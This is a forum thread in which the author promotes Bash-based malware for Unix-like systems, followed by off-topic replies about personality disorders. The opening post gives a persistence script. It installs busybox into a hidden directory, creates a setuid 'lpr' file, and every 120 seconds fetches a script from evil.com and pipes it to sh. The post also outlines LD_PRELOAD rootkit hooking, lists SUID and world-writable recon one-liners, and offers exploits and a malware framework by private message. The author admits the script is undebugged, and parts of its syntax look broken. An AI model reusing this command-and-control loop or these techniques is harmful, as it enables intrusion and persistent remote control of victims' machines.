User Controls
Sh/Bash Hellscripts. Implementations, Potential Limitations & Dev
-
2021-11-08 at 7:50 PM UTCPreamble
Welcome to another edition of Sophie's Cyber Shenanigans. In this thread i want to take a more closer look at some of the things we discussed in this thread. Expand on the concept, and discuss some ideas related to it. Specifically on the potential of utilizing Sh/Bash as a universal solution for the development, deployment, and general operation of Malwares targeting *Nix.
I've been a bit obsessed the last 6 to 10 months with creating effective malware for *Nix. In part due to the fact a lot of web servers use Linux Distros for their day to day operations, IoT/Embedded devices, and the fact that the maturity of *Nix allows for a variety of setups. Not just for people interested in programming or security, but media development, networking solutions up to the enterprise level, and general use as a day to day OS.
As such I've done a lot more research into the feasibility of the concept by gathering resources that really take a deep dive approach to advanced shell scripting and Linux security in general. Before we move on from this rather long preamble i just wanted to mention that i set up a secure sharing platform, accessible by request, that you can use to download some of the resources i've been using. A couple things you can get from there are E-Books including Advanced Shellscripting in Bash, Advanced C for Unix, Linux Kernel Resources, documents related to how ELF and other *Nix executable formats work, Static Binaries, with source code and Makefiles, and a couple of PoCs. If you're interested in any of that send me a PM and i will give you access to the secure storage.
Linux Malware
Some stuff to consider.
Most people have a general understanding that Linux is less susceptible to Malware and compared to anything Microsoft puts out that is certainly the case, not to mention the fact that Black Hats tend to focus more on Windows because at the end of the day that's where the money is. In practical terms though, while no system is 100% secure any distro can be configured to be as secure as possible, and while there are enough utilities OSS and otherwise that help with that, it takes a certain amount of know-how in order to harden Linux and be able to parse and interpret all the data coming in from logging tools and the like. Of course an enterprise will have this figured out if they have a decent blue team and/or SOC with the proper playbooks and incident response teams.
Operations against specific enterprises should be conducted in a way that is tailored towards the enterprise and operational directive in question. That is not to say that Sh/bash based malware won't work but a sophisticated threat actor will use all the intel available to them to decide what is best for their particular scenario. The above is tangentially related to what this thread is about but it should give you a little bit of context. When i am talking about a universal solution in terms of Linux malware, engaging an enterprise is a little bit more nuanced. What i am proposing is a universal solution in terms compatibility with different distros and architectures. Which leads nicely into the following:
Let's take a common Linux Rootkit technique as an example. A lot those, use LD_PRELOAD to inject their own libraries and hook functions on the target system, this is possible because of dynamically linked executables. In plain English, the dynamically linked executables(ELF Files) essentially load one of the attackers libs when executed after being altered by the attacker specifying the LD_PRELOAD environment variable, which can change their behavior in wonderful and terrible ways. So far so good, you are not dependent on the libs specific to that system, if you're smart you write your rootkit in such a way that it affects or checks for both ELF32 and ELF64 files to cover your bases.
Writing a shell script, obfuscating it and having it run on the target machine will spare you the trouble though, because it will just invoke the utilities as they exist on the target machine.
As an interesting aside;
I have a tool that allows me to take a shell script i wrote, parse it, check the utils it invokes and automatically write out C source that will use the LD_PRELOAD method to change the libs the ELF files on the target machine uses in such a way that they will work as they are supposed to even if they differ from the same utils my machine would invoke. The C output i can then compile locally and ship off to any other Linux Box where it will run as if it were a static binary.
You could even run a shell script through the tool i mentioned, and have the compiled version write out an obfuscated shell script on the target machine and then execute that as an embedded payload.
If you're interested in reverse engineering and ELF Malware analysis you should definitely check the repo below out.
git clone https://github.com/ashalaginov/Linux-ELF-malware-static-analysis.git
Implementations
Your average linux distro is full of tools and utilities that are excellent for command and control operations, crypto ops, and all kinds of shenanigans. Below is an example i wrote of a shell script that checks a remote source every set interval of time, downloads a new script(Set of commands) and runs it
#!/usr/bin/env -S bash\_"umask\_700"\_-f
cd ~/.local/sbin 2>/dev/null 1>/dev/null || mkdir ~/.local/sbin 2>/dev/null 1>/dev/null
buff_ops()
{
cmd=$1
arg=$2
rm -r u_dev; mknod u_dev p && cat < `read -t (${cmd $'\0' arg})` 0<u_dev | /bin/bash 1>u_dev
};
if [ -x $(which busybox) ]; then
buff_ops 'busybox' '--install ~/.local/sbin'
buff_ops 'chmod' '--recursive +xst . '
cat << EOF > ~/.local/sbin/lpr
#!/usr/bin/env -S bash\_"umask\_700"\_-f
buff_ops()
{
cmd=$1
arg=$2
rm -r u_dev; mknod u_dev p && cat < `read -t (${cmd $'\0' arg})` 0<u_dev | /bin/bash 1>u_dev
};
buff_ops './watch ' '-t -n 120 -e wget -nv -O https://evil.com/commands.sh | sh & '
EOF
chmod 4777 ~/.local/sbin/lpr
buff_ops './lpr'
fi
If i've made some mistakes regarding syntax, that's on me, i haven't had a chance to debug the above script yet.
Also instead of creating new dirs in a place we might not have permissions to do so, we could always use the /tmp directory as a temporary staging area.
For recon/enum regarding permissions simple one liners might be useful.
find / -perm 4000 2>/dev/null
find / -perm -o+w 2>/dev/null
An interactive shell will allow you to run this.
And those are just some of the examples i've been working on.
How this all ties together, how we might launch exploits in Asm or shellcode, and how we might compile such exploits in situ that is to say on the target machine, i'll leave up to PART 2 which i will post ITT. I'm on a schedule at the moment unfortunately. And this is about all the time i got for now.
Also, in Part 2 i'll tell you all about a framework i am developing that puts all this and more together to allow me and those that are interested, create complete Sh/Bash based malwares with relative ease. I will release this framework as a Dockerfile when it's done. It's going to be dope.
Anyway, in the mean time feel free to post some questions, correct me where i am wrong and leave some constructive criticism if you are so inclined. I'll be back later today to finish this up. -
2021-11-15 at 4:52 PM UTCI know this thread a little heavy on the theory behind it all, and requires some understanding of relatively low level Linux, which is why i set up the secure storage with the resources i mentioned above. If you're interested they're still available, all you need to do is send me a PM.
I'm still writing part two, even if interest in the subject at this level is limited, i find writing my thoughts out to be helpful in increasing my own understanding of the subject matter. As always, feel free to ask any questions regarding anything contained within this thread, or the previous one in the series. And feedback is appreciated as well.
If you read the OP you know i am working on a Framework that will be deployed through Docker that will have a number of unique and custom tools, that will help with the creation of Bash/Sh based malware components, payloads and more. It will also have a broad selection of third party tools for obfuscation, encoding, platform specific payload generation and a small library of exploits that come in source code, pre-compiled, and as shellcode or ASM, depending on the type of attack it will allow you to execute.
If you're not that big into the theory of it all, i am pretty sure you will appreciate the Docker Image as a powerful OffSec tool that will be easy to use. Complimentary tools might include reverse engineering utils and scripts/programs that assist in creating ROPGadgets and more. -
2021-11-15 at 9:20 PM UTCWhile I don’t fully understanding your musings, I can appreciate your dedication to your craft, albeit sociopathic in nature.
-
2021-11-15 at 10:03 PM UTC
Originally posted by Ajax While I don’t fully understanding your musings, I can appreciate your dedication to your craft, albeit sociopathic in nature.
Thank you. It's true that my musings are sometimes hard to follow, not because of any technical details, but when i write a thread such as this i start of with stream of consciousness that condenses the stuff i have been looking into and thinking about for a while, afterwards, i give it structure. This structuring process is also what allows me to formulate some concrete ideas. to put forward. Which personally helps me understand the material better and is overall beneficial to myself and hopefully the reader.
I don't mind being called a sociopath, but is the reason for characterizing my dedication to the craft as sociopathic due to the fact that i am primarily concerned with creating malware, or 'cyber weapons' for lack of a better term? -
2021-11-15 at 11:54 PM UTC
Originally posted by Sophie Thank you. It's true that my musings are sometimes hard to follow, not because of any technical details, but when i write a thread such as this i start of with stream of consciousness that condenses the stuff i have been looking into and thinking about for a while, afterwards, i give it structure. This structuring process is also what allows me to formulate some concrete ideas. to put forward. Which personally helps me understand the material better and is overall beneficial to myself and hopefully the reader.
I don't mind being called a sociopath, but is the reason for characterizing my dedication to the craft as sociopathic due to the fact that i am primarily concerned with creating malware, or 'cyber weapons' for lack of a better term?
Being sociopathic is not necessarily a bad thing. Psychopathic is because that’s when manipulation for personal gain comes into play.
A quick google to make sure I’m not too far off base says: “Those with antisocial personality disorder tend to lie, break laws, act impulsively, and lack regard for their own safety or the safety of others.” Would you tend to agree with that armchair diagnosis for yourself? I believe some of your ways drives a mental state (paranoia is a harsh-sounding term) in which you tend to obsess over opsec and infosec to a degree that prohibits you from developing meaningful relationships. In doing so, it drives your desire to further do things for personal gain (again, not quite at the manipulative level).
Of course, as I always maintain, and I’m sure you would agree, we only know what you want us to know. For all I know, you could be playing a character.
To wrap it up, I am always interested in the true musings of people regardless of subject matter. It is when passion surfaces that we truly learn about one’s true self. At least, what one wants us to know.The following users say it would be alright if the author of this post didn't die in a fire! -
2021-11-16 at 12:21 AM UTC
Originally posted by Ajax Being sociopathic is not necessarily a bad thing. Psychopathic is because that’s when manipulation for personal gain comes into play.
A quick google to make sure I’m not too far off base says: “Those with antisocial personality disorder tend to lie, break laws, act impulsively, and lack regard for their own safety or the safety of others.” Would you tend to agree with that armchair diagnosis for yourself? I believe some of your ways drives a mental state (paranoia is a harsh-sounding term) in which you tend to obsess over opsec and infosec to a degree that prohibits you from developing meaningful relationships. In doing so, it drives your desire to further do things for personal gain (again, not quite at the manipulative level).
Of course, as I always maintain, and I’m sure you would agree, we only know what you want us to know. For all I know, you could be playing a character.
To wrap it up, I am always interested in the true musings of people regardless of subject matter. It is when passion surfaces that we truly learn about one’s true self. At least, what one wants us to know.
Thank you for clarifying, i try to be true to myself within reason on the internet. At least here and some other venues. Paranoia comes with the territory when matters of cyber security are involved. IRL i don't really experience a lot of paranoia, as such it doesn't interfere with my ability to form meaningful relations with people. There is a high probability however that i have Borderline Personality Disorder. Interestingly it's rare in guys, and when it does occur it manifests itself differently than it would with women who suffer from the same disorder. There are some traits that can crop up with BPD that look like Anti-Social Personality disorder or sociopathy. BPD and ASPD are within the same cluster of personality disorders as well. However ASPD has diminished emotional intensity especially as it pertains to fear, guilt, shame etc. While BPD has an enhanced emotional intensity to it across the entire spectrum of emotions. Positive and negative emotions are enhanced. To the point where negative emotions like anger sooner lead to callous behavior and a disregard for personal safety and the safety of others.
It's quite a complex topic. -
2021-11-16 at 1:54 AM UTCInteresting points. Do you think personality is something one can control? I feel like we can learn about what desirable personality traits are and what undesirable traits are, but it’s difficult to make substantial changes. I’m a mostly pleasant person to be around, but I have my flaws. I’ve been given feedback throughout my life and career and I’m aware of how I have some undesirable personality traits, but it is difficult to modify one’s personality beyond the superficial. Which leads me to the question, can we control personality? If so, should we? If not, should it be held against us?
Sorry for derailing the thread with this. Feel free to bring it back on topic.
